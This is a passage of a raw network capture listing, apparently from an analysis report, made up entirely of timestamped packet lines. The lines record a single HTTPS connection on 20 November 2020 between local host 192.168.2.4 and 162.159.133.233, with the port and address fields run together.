                                                                                                                                                Nov 20, 2020 11:27:17.495903969 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.495924950 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.495928049 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.495930910 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.495933056 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.495951891 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.495953083 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.495960951 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.495965958 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.495985031 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.495994091 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496016026 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496030092 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496037960 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496059895 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496073008 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496089935 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496105909 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496107101 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496128082 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496155024 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496162891 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496176004 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496176958 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496198893 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496208906 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496221066 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496239901 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496243000 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496265888 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496274948 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496288061 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496314049 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496314049 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496339083 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496355057 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496366978 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496387959 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496388912 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496412992 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496423006 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496436119 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496454000 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496459961 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496484995 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496491909 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496510983 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496535063 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496536016 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496555090 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496579885 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496596098 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496615887 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496623039 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496649027 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496669054 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496671915 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496691942 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496699095 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496715069 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496726036 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496752024 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496762037 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496773958 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496777058 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496803045 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496810913 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496826887 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496843100 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496854067 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496881008 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496906042 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496907949 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496932983 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496958017 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.496963978 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.496989012 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497008085 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497009039 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497028112 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497033119 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497057915 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497078896 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497081995 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497107029 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497107983 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497133017 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497143984 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497159004 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497163057 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497185946 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497195005 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497212887 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497217894 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497237921 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497246981 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497263908 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497275114 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497291088 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497306108 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497318983 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497335911 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497344971 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497366905 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497370005 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497394085 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497419119 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497419119 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497446060 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497464895 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497472048 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497493982 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497497082 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497523069 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497524023 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497549057 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497550011 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497576952 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497596979 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497602940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497626066 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497628927 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497653008 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497677088 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497678995 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497698069 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497699976 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497721910 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497730017 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497747898 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497752905 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497776985 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497783899 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497803926 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497813940 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497829914 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497838974 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497855902 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497867107 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497885942 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497900009 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497910023 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497924089 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497936010 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497953892 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497960091 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.497981071 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.497989893 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.498012066 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.498016119 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.498038054 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.498043060 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.498068094 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.498070955 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.498092890 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.498097897 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.498121023 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.498122931 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.498148918 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.498176098 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.506792068 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514486074 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514523983 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514548063 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514571905 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514583111 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514596939 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514612913 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514626980 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514652014 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514666080 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514673948 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514698029 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514705896 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514722109 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514734983 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514746904 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514758110 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514771938 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514794111 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514796019 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514818907 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514825106 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514849901 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514858961 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514873981 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514882088 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514899015 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514920950 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514924049 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514949083 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514950991 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.514975071 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.514976025 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515002012 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515010118 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515029907 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515041113 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515053988 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515074968 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515099049 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515599966 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515625954 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515650034 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515662909 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515674114 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515697002 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515703917 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515723944 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515748978 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515758038 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515773058 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515789986 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515798092 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515822887 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515825987 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515847921 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515850067 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515872955 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515875101 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515897989 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515908957 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515923977 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515937090 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515948057 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.515969992 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.515996933 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523150921 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523181915 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523205996 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523216009 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523231030 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523256063 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523263931 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523283958 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523308992 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523313046 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523333073 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523340940 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523358107 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523382902 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523387909 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523402929 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523427963 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523436069 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523451090 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523452044 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523479939 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523488998 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523505926 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523514032 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523531914 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523540020 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523555994 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523581028 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523581982 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523607016 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523607016 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523632050 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523642063 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523655891 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523679972 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523684025 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523709059 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523716927 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523732901 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523755074 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523756981 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523782015 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523794889 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523807049 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523822069 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523832083 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523855925 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523858070 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523881912 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523883104 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523910046 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523914099 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523931980 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523935080 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523962021 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.523983002 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.523984909 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524008989 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524009943 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524034977 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524048090 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524060011 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524072886 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524086952 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524111032 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524111986 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524135113 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524137974 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524159908 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524168015 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524184942 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524188995 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524208069 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524213076 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524233103 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524245977 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524256945 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.524265051 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.524283886 CET44349749162.159.133.233192.168.2.4
